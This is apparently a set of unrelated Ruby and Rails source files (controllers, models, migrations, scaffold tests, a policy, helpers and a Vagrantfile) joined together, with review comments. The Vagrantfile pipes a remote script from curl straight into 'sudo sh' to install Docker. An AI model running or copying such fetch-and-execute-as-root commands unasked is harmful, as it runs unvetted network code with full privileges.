    end

    # Decrypts +username+'s share with +password+ and rebuilds the Key.
    def unlock_key(username, password)
      key = find_key(username)
      salt = key['salt']
      ciphertext = key['encrypted_point']
      plaintext = _decrypt(ciphertext, salt, password)
      Trustworthy::Key.create_from_string(plaintext)
    end

    # Internal: derives a cipher from an scrypt salt string and a password.
    def _cipher_from_password(salt, password)
      # NOTE(review): String#rpartition returns [head, separator, tail]; this
      # two-variable assignment yields cost = head and salt = "$" (the
      # separator itself), discarding the tail. Encrypt and decrypt both go
      # through this path so values still round-trip, but confirm the
      # intended destructuring (possibly `cost, _, salt = ...`).
      cost, salt = salt.rpartition('$')
      key = SCrypt::Engine.scrypt(password, salt, cost, Trustworthy::Cipher.key_len)
      Trustworthy::Cipher.new(key)
    end

    # Internal: splits "nonce--ciphertext" (Base64 halves) and decrypts.
    def _decrypt(ciphertext, salt, password)
      cipher = _cipher_from_password(salt, password)
      nonce, ciphertext = ciphertext.split('--').map do |field|
        Base64.decode64(field)
      end
      cipher.decrypt(nonce, '', ciphertext)
    end

    # Internal: encrypts +plaintext+ and encodes as "nonce--ciphertext",
    # each half Base64 without embedded newlines.
    def _encrypt(plaintext, salt, password)
      cipher = _cipher_from_password(salt, password)
      nonce = Trustworthy::Cipher.generate_nonce
      ciphertext = cipher.encrypt(nonce, '', plaintext)
      [nonce, ciphertext].map do |field|
        Base64.encode64(field).gsub("\n", '')
      end.join('--')
    end
  end
end
|
class CategoriesController < ApplicationController
  # GET /categories/:id
  def show
    # Bug fix: `Category.find_by(params[:id])` passed the raw id as a
    # conditions argument (effectively `where("<id>")`), not a primary-key
    # lookup. Look up by id explicitly; still returns nil when not found.
    @category = Category.find_by(id: params[:id])
  end

  # GET /categories
  def index
    @categories = Category.all
  end

  private

  # Strong parameters for create/update actions (currently unused here).
  def category_params
    params.require(:category).permit(:title)
  end
end
|
require 'test_helper'
# Scaffold-style integration tests covering the Posts CRUD cycle.
class PostsControllerTest < ActionDispatch::IntegrationTest
  setup do
    # Fixture defined in test/fixtures/posts.yml.
    @post = posts(:one)
  end

  test "should get index" do
    get posts_url
    assert_response :success
  end

  test "should get new" do
    get new_post_url
    assert_response :success
  end

  test "should create post" do
    assert_difference('Post.count') do
      post posts_url, params: { post: { activity: @post.activity, address: @post.address, bar: @post.bar, favorite_id: @post.favorite_id, image: @post.image, location_id: @post.location_id, location_name: @post.location_name, phone: @post.phone, post_name: @post.post_name, rating_id: @post.rating_id, restaurant: @post.restaurant, text: @post.text, user_id: @post.user_id } }
    end

    assert_redirected_to post_url(Post.last)
  end

  test "should show post" do
    get post_url(@post)
    assert_response :success
  end

  test "should get edit" do
    get edit_post_url(@post)
    assert_response :success
  end

  test "should update post" do
    patch post_url(@post), params: { post: { activity: @post.activity, address: @post.address, bar: @post.bar, favorite_id: @post.favorite_id, image: @post.image, location_id: @post.location_id, location_name: @post.location_name, phone: @post.phone, post_name: @post.post_name, rating_id: @post.rating_id, restaurant: @post.restaurant, text: @post.text, user_id: @post.user_id } }
    assert_redirected_to post_url(@post)
  end

  test "should destroy post" do
    assert_difference('Post.count', -1) do
      delete post_url(@post)
    end

    assert_redirected_to posts_url
  end
end
|
require 'test_helper'
# Scaffold-style integration tests covering the Pallets CRUD cycle.
class PalletsControllerTest < ActionDispatch::IntegrationTest
  setup do
    # Fixture defined in test/fixtures/pallets.yml.
    @pallet = pallets(:one)
  end

  test "should get index" do
    get pallets_url
    assert_response :success
  end

  test "should get new" do
    get new_pallet_url
    assert_response :success
  end

  test "should create pallet" do
    assert_difference('Pallet.count') do
      post pallets_url, params: { pallet: { current_location: @pallet.current_location, destination_cc: @pallet.destination_cc, next_location: @pallet.next_location, number_of_pallets: @pallet.number_of_pallets, origin_cc: @pallet.origin_cc, vendor_code: @pallet.vendor_code } }
    end

    assert_redirected_to pallet_url(Pallet.last)
  end

  test "should show pallet" do
    get pallet_url(@pallet)
    assert_response :success
  end

  test "should get edit" do
    get edit_pallet_url(@pallet)
    assert_response :success
  end

  test "should update pallet" do
    patch pallet_url(@pallet), params: { pallet: { current_location: @pallet.current_location, destination_cc: @pallet.destination_cc, next_location: @pallet.next_location, number_of_pallets: @pallet.number_of_pallets, origin_cc: @pallet.origin_cc, vendor_code: @pallet.vendor_code } }
    assert_redirected_to pallet_url(@pallet)
  end

  test "should destroy pallet" do
    assert_difference('Pallet.count', -1) do
      delete pallet_url(@pallet)
    end

    assert_redirected_to pallets_url
  end
end
|
# An event category with tags and a Paperclip-attached image.
class Category < ActiveRecord::Base
  has_many :categorizations
  has_many :events, through: :categorizations
  has_many :taggings, as: :taggable
  has_many :tags, through: :taggings

  has_attached_file :image, styles: { small: "100x100#", medium: "250x250#" }

  validates :name, uniqueness: true
  validates_presence_of :description, :image

  # URL slug: lowercased name, non-alphanumerics turned into dashes,
  # runs of dashes collapsed to one.
  def to_param
    slug = name.downcase.gsub(/[^[:alnum:]]/, '-')
    slug.gsub(/-{2,}/, '-')
  end
end
|
# A place that can appear on many itineraries and carry many categories
# (both via HABTM join tables).
class Place < ApplicationRecord
  has_and_belongs_to_many :itineraries
  has_and_belongs_to_many :categories
end
|
require_relative 'test_helper'
require_relative '../lib/transaction_repository'
require_relative '../lib/transaction'
# Unit tests for TransactionRepository: finders, create/update/delete.
class TransactionRepositoryTest < Minitest::Test
  def setup
    @transaction_1 = Transaction.new({:id => 6, :invoice_id => 8, :credit_card_number => "4242424242421111", :credit_card_expiration_date => "0220", :result => :success, :created_at => Time.now, :updated_at => Time.now})
    @transaction_2 = Transaction.new({:id => 7, :invoice_id => 9, :credit_card_number => "4242424242422222", :credit_card_expiration_date => "0321", :result => :success, :created_at => Time.now, :updated_at => Time.now})
    @transaction_3 = Transaction.new({:id => 8, :invoice_id => 10, :credit_card_number => "4242424242423333", :credit_card_expiration_date => "0422", :result => :success, :created_at => Time.now, :updated_at => Time.now})
    @transaction_4 = Transaction.new({:id => 9, :invoice_id => 11, :credit_card_number => "4242424242424444", :credit_card_expiration_date => "0523", :result => :success, :created_at => Time.now, :updated_at => Time.now})
    @transactions = [@transaction_1, @transaction_2, @transaction_3, @transaction_4]
    @transaction_repository = TransactionRepository.new(@transactions)
  end

  def test_it_exists
    assert_instance_of TransactionRepository, @transaction_repository
  end

  def test_it_returns_all_transactions
    assert_equal @transactions, @transaction_repository.all
  end

  def test_it_can_find_by_id
    assert_equal @transaction_1, @transaction_repository.find_by_id(6)
    # Fix: `assert_equal nil, x` is deprecated and raises in Minitest 6;
    # use assert_nil instead.
    assert_nil @transaction_repository.find_by_id(8798798)
  end

  def test_it_can_find_all_by_invoice_id
    assert_equal [], @transaction_repository.find_all_by_invoice_id(37)
    assert_equal [@transaction_4], @transaction_repository.find_all_by_invoice_id(11)
  end

  def test_it_can_find_by_credit_card_number
    assert_equal [], @transaction_repository.find_all_by_credit_card_number("987987987")
    assert_equal [@transaction_3], @transaction_repository.find_all_by_credit_card_number("4242424242423333")
  end

  def test_it_can_find_all_by_result
    assert_equal [], @transaction_repository.find_all_by_result("card shut off")
    assert_equal @transactions, @transaction_repository.find_all_by_result(:success)
  end

  def test_transaction_can_be_created
    # The repository is expected to assign the next id (10), ignoring the
    # :id supplied in the attributes.
    @transaction_repository.create({:id => 6, :invoice_id => 8, :credit_card_number => "4242424242425555", :credit_card_expiration_date => "0720", :result => :success, :created_at => Time.now, :updated_at => Time.now})
    actual = @transaction_repository.all.last.id
    assert_equal 10, actual
    assert_equal 5, @transaction_repository.all.count
  end

  def test_it_can_be_updated
    original_time = @transaction_1.updated_at
    @transaction_repository.update(6, {:id => 6, :invoice_id => 8, :credit_card_number => "4242424242429999", :credit_card_expiration_date => "0223", :result => :bingo, :created_at => Time.now, :updated_at => Time.now})
    assert original_time < @transaction_1.updated_at
    actual = @transaction_repository.find_by_id(6).credit_card_number
    assert_equal "4242424242429999", actual
    actual = @transaction_repository.find_by_id(6).credit_card_expiration_date
    assert_equal "0223", actual
    actual = @transaction_repository.find_by_id(6).result
    assert_equal :bingo, actual
  end

  def test_transaction_can_be_deleted
    assert_equal 4, @transaction_repository.all.count
    @transaction_repository.delete(8)
    assert_equal 3, @transaction_repository.all.count
    # Fix: assert_nil instead of deprecated `assert_equal nil`.
    assert_nil @transaction_repository.find_by_id(8)
  end
end
|
module PagesHelper
  # Returns a hash of { date => num } covering every date in +date_range+.
  # Dates missing from +date_count_data+ default to 0 so chart axes stay
  # fixed instead of rescaling around sparse data.
  def daily_date_data(date_count_data, date_range)
    zero_filled = date_range.each_with_object({}) { |date, acc| acc[date] = 0 }
    zero_filled.merge(date_count_data)
  end
end
|
# Your Code Here
# In-place map: replaces each element of +array+ with the block's result
# and returns the (mutated) array — unlike Array#map, the input is changed.
def map(array)
  array.each_index do |idx|
    array[idx] = yield(array[idx])
  end
  array
end
# Folds +array+ left-to-right with the block. When a truthy
# +starting_point+ is given the fold starts there and covers every
# element; otherwise the first element seeds the accumulator (so a
# one-element array returns that element untouched, and [] returns nil).
def reduce(array, starting_point = nil)
  if starting_point
    accumulator = starting_point
    remainder = array
  else
    accumulator = array[0]
    remainder = array[1..-1] || []
  end
  remainder.each do |element|
    accumulator = yield(accumulator, element)
  end
  accumulator
end
# def reduce(array, starting_point = nil)
# i = 0
# total = 0
# new_array = []
# if starting_point
# while i < array.length
# starting_point = yield(starting_point, array[i])
# i += 1
# end
# return starting_point
# else
# while i < array.length
# if array[i] == true
# return yield(array[i])
# elsif array[i] != true
# return yield(array[i])
# end
# total = yield(total, array[i])
# i += 1
# end
# end
# total
# end
# def reduce(array)
# i = 0
# new_array = []
# while i < array.length
# if array[i]
# new_array << array[i]
# else
# end
# i += 1
# end
# if new_array.length == 0
# return FALSE
# else
# return TRUE
# end
# end |
class Hash
  # Returns the keys whose VALUES match any of the given arguments.
  #   { a: 1, b: 2, c: 1 }.keys_of(1)    #=> [:a, :c]
  #   { a: 1, b: 2 }.keys_of(1, 2)       #=> [:a, :b]
  # The splat lets callers pass any number of candidate values.
  def keys_of(*arguments)
    select { |_key, value| arguments.include?(value) }.keys
  end
end
|
# Enforces email uniqueness at the database level with a unique index.
class AddEmailUniquenessIndex < ActiveRecord::Migration
  def self.up
    # NOTE(review): the column is :mail although the class name says
    # "Email" — confirm the users table really uses `mail`.
    add_index :users, :mail, :unique => true
  end

  def self.down
    remove_index :users, :mail
  end
end
|
require 'spec_helper'

# View spec: the edit form renders with the expected action/method and
# the Id_Number input field.
describe "personal_informations/edit" do
  before(:each) do
    @personal_information = assign(:personal_information, stub_model(PersonalInformation,
      :Id_Number => ""
    ))
  end

  it "renders the edit personal_information form" do
    render

    # Run the generator again with the --webrat flag if you want to use webrat matchers
    assert_select "form[action=?][method=?]", personal_information_path(@personal_information), "post" do
      assert_select "input#personal_information_Id_Number[name=?]", "personal_information[Id_Number]"
    end
  end
end
|
# Drops the units.game_id column.
class RemoveGameIdFromUnit < ActiveRecord::Migration[5.1]
  def change
    # The type is given so the column can be recreated on rollback.
    remove_column :units, :game_id, :integer
  end
end
|
require "spec_helper"

# Routing specs for the standard RESTful residences resource.
# NOTE(review): uses the legacy `should` expectation syntax — requires
# RSpec to be configured with `expect_with ... syntax: [:should]`.
describe ResidencesController do
  describe "routing" do

    it "routes to #index" do
      get("/residences").should route_to("residences#index")
    end

    it "routes to #new" do
      get("/residences/new").should route_to("residences#new")
    end

    it "routes to #show" do
      get("/residences/1").should route_to("residences#show", :id => "1")
    end

    it "routes to #edit" do
      get("/residences/1/edit").should route_to("residences#edit", :id => "1")
    end

    it "routes to #create" do
      post("/residences").should route_to("residences#create")
    end

    it "routes to #update" do
      put("/residences/1").should route_to("residences#update", :id => "1")
    end

    it "routes to #destroy" do
      delete("/residences/1").should route_to("residences#destroy", :id => "1")
    end

  end
end
|
# A user's shelf; every shelf must reference an owning user.
class Shelf < ApplicationRecord
  validates :user_id, presence: true
end
|
# Adds goals.imported_id — presumably the record's id in an external
# system goals are imported from (bigint to fit large source ids).
class AddImportedIdToGoals < ActiveRecord::Migration[5.1]
  def change
    add_column :goals, :imported_id, :bigint
  end
end
|
# Pundit-style policy controlling who may manage User records.
class UserPolicy < ApplicationPolicy
  # Only admins may create users.
  def create?
    user.admin?
  end

  # Admins may update anyone; users may update their own record.
  def update?
    user.admin? || is_self?
  end

  # Guests can never destroy; otherwise admins or the user themself.
  # NOTE(review): is_guest? is not defined in this class — presumably
  # inherited from ApplicationPolicy; verify.
  def destroy?
    return false if is_guest?
    user.admin? || is_self?
  end

  private

  # True when the acting user IS the record being acted upon.
  def is_self?
    user == record
  end
end
|
require 'test_helper'
# Scaffold-style functional tests covering the HistoricAssets CRUD cycle
# (legacy ActionController::TestCase style: get/post with symbols).
class HistoricAssetsControllerTest < ActionController::TestCase
  setup do
    # Fixture defined in test/fixtures/historic_assets.yml.
    @historic_asset = historic_assets(:one)
  end

  test "should get index" do
    get :index
    assert_response :success
    assert_not_nil assigns(:historic_assets)
  end

  test "should get new" do
    get :new
    assert_response :success
  end

  test "should create historic_asset" do
    assert_difference('HistoricAsset.count') do
      post :create, historic_asset: { description: @historic_asset.description, historic_asset_type: @historic_asset.historic_asset_type }
    end

    assert_redirected_to historic_asset_path(assigns(:historic_asset))
  end

  test "should show historic_asset" do
    get :show, id: @historic_asset
    assert_response :success
  end

  test "should get edit" do
    get :edit, id: @historic_asset
    assert_response :success
  end

  test "should update historic_asset" do
    patch :update, id: @historic_asset, historic_asset: { description: @historic_asset.description, historic_asset_type: @historic_asset.historic_asset_type }
    assert_redirected_to historic_asset_path(assigns(:historic_asset))
  end

  test "should destroy historic_asset" do
    assert_difference('HistoricAsset.count', -1) do
      delete :destroy, id: @historic_asset
    end

    assert_redirected_to historic_assets_path
  end
end
|
# Vagrant definition: Ubuntu precise64 VM named "docker", provisioned with
# curl and Docker (via the get.docker.io install script).
VAGRANTFILE_API_VERSION = "2"
name = "docker"
home = "/home/vagrant/project"
memory = "512"
cpu="2"

Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
  config.vm.box = "precise64"
  config.vm.box_url = "http://files.vagrantup.com/precise64.box"

  # VirtualBox resources: 512 MB RAM, 2 CPUs, 16 MB video RAM.
  config.vm.provider "virtualbox" do |v|
    v.name = name
    v.customize ["modifyvm", :id, "--memory", memory]
    v.customize ["modifyvm", :id, "--cpus", cpu]
    v.customize ["modifyvm", :id, "--vram", "16"]
  end

  # Sync the project directory into the guest at /home/vagrant/project.
  config.vm.synced_folder ".", home

  # Provision: install curl, then Docker from the official install script.
  config.vm.provision "shell", inline: "sudo apt-get install -y curl"
  config.vm.provision "shell", inline: "curl -sSL https://get.docker.io/ubuntu/ | sudo sh"
end
|
# Creates the media_files table holding uploaded assets and their
# Zencoder transcoding state.
class CreateMediaFiles < ActiveRecord::Migration
  def change
    create_table :media_files do |t|
      t.string :name
      t.string :description
      # Bug fix: `t.string :file` was declared twice; a single definition
      # remains.
      t.string :file
      t.string :zencoder_output_id
      t.boolean :processed
      t.string :asset_type
      t.integer :file_size
      t.string :content_type
      t.references :sermon

      t.timestamps
    end
  end
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.